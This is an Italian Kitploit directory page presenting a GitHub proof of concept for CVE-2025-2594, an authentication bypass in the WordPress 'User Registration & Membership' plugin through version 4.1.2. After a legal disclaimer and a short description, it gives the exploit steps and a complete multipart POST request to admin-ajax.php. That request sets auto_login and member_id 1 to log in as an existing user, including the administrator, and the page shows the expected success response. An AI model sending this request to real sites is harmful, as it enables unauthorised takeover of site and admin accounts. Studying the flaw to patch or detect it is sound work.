Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-2594 — User Registration & Membership <= 4.1.2 - Bypass dell'autenticazione | Kitploit
Strumenti/GitHubGitHub/ubaydev/cve-2025-2594
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHububaydev/cve-2025-2594

CVE-2025-2594

User Registration & Membership <= 4.1.2 - Bypass dell'autenticazione

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-2594

User Registration & Membership <= 4.1.2 - Bypass dell'autenticazione

Dichiarazione di non responsabilità!

Le informazioni presentate in questo report CVE (Common Vulnerabilities and Exposures) sono solo a scopo educativo e informativo. I dettagli forniti si basano su risorse disponibili pubblicamente, ricerche e analisi condotte dall'autore. Il contenuto non è inteso a promuovere o incoraggiare attività illegali, inclusi hacking, sfruttamento di vulnerabilità o accesso non autorizzato ai sistemi.

L'autore non si assume alcuna responsabilità per un uso improprio delle informazioni presentate. Si raccomanda che individui e organizzazioni applichino queste conoscenze in modo responsabile e nel rispetto delle leggi e dei regolamenti applicabili. I lettori sono vivamente consigliati a testare le vulnerabilità solo in ambienti controllati e con la dovuta autorizzazione.

L'autore e i collaboratori di questo report non approvano né supportano attività dannose e incoraggiano la divulgazione responsabile e le pratiche di hacking etico.


Descrizione

È stata scoperta una vulnerabilità critica di sicurezza nel plugin WordPress "User Registration & Membership", uno strumento popolare per creare siti di membership e moduli di registrazione. La falla, identificata come CVE-2025-2594, ha un punteggio CVSS di 8.1, a indicare la sua elevata gravità.

Il plugin User Registration & Membership per WordPress è vulnerabile al bypass dell'autenticazione nelle versioni fino alla 4.1.2 inclusa. Ciò è dovuto a un'autenticazione errata nella funzione 'confirm_payment()'. Questo rende possibile per attaccanti non autenticati accedere come un utente esistente del sito, anche come amministratore, alle seguenti condizioni:

  1. Il plugin ha attivo l'add-on di membership

PoC (Prova di concetto)

  1. ottenere _confirm_payment_nonce nella pagina di registrazione
  2. Esempio di dati della richiesta
    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    User-Agent: PostmanRuntime/7.43.3
    Accept: */*
    Postman-Token: b41b34c8-c1c9-4e3a-aa4f-380706626e7a
    Host: hackthebox.test
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=--------------------------705549092016875046023302
    Content-Length: 565
    
    ----------------------------705549092016875046023302
    Content-Disposition: form-data; name="action"
    
    user_registration_membership_confirm_payment
    ----------------------------705549092016875046023302
    Content-Disposition: form-data; name="security"
    
    CONFIRM_PAYMENT_NONCE
    ----------------------------705549092016875046023302
    Content-Disposition: form-data; name="form_response"
    
    { "auto_login": true }
    ----------------------------705549092016875046023302
    Content-Disposition: form-data; name="member_id"
    
    1
    ----------------------------705549092016875046023302--
    
  3. La risposta deve essere simile a questa
    root@kitploit:~
    {"success":true,"data":{"message":null}}
    
  4. Risposta di esempio Schermata 14

Riferimenti

  1. https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-412-authentication-bypass
  2. https://plugins.trac.wordpress.org/browser/user-registration/tags/4.1.1/modules/membership/includes/AJAX.php#L566
  3. https://plugins.trac.wordpress.org/changeset/3262077/user-registration/trunk/modules/membership/includes/AJAX.php
  4. https://plugins.trac.wordpress.org/changeset/3262077/user-registration/trunk/modules/membership/includes/Admin/Services/MembersService.php

Ringraziamenti

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii
Scarica lo strumento